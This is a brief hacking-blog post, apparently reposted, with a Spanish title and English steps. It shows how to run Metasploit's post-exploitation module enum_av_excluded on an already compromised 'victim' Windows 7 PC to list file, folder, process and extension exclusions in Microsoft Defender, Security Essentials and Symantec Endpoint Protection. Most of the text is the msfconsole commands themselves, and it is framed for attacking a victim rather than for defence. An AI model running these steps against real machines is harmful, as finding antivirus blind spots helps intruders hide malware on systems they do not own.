Cómo obtener información del Antivirus del PC Víctima usando Metasploit
First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)
This module will enumerate the file, directory, process and extension-based exclusions from supported AV products, which currently includes Microsoft Defender, Microsoft Security Essentials/Antimalware, and Symantec Endpoint Protection.
Exploit Targets
Windows 7
Attacker: kali Linux
Victim PC: Windows 7
Open Kali terminal type msfconsole
Now type use post/windows/gather/enum_av_excluded
msf exploit (enum_av_excluded)>set lhost (IP of Local Host)
msf exploit (enum_av_excluded)>set session 1
msf exploit (enum_av_excluded)>exploit
Via: rajhackingarticles.blogspot.com
Cómo obtener información del Antivirus del PC Víctima usando Metasploit
Reviewed by Zion3R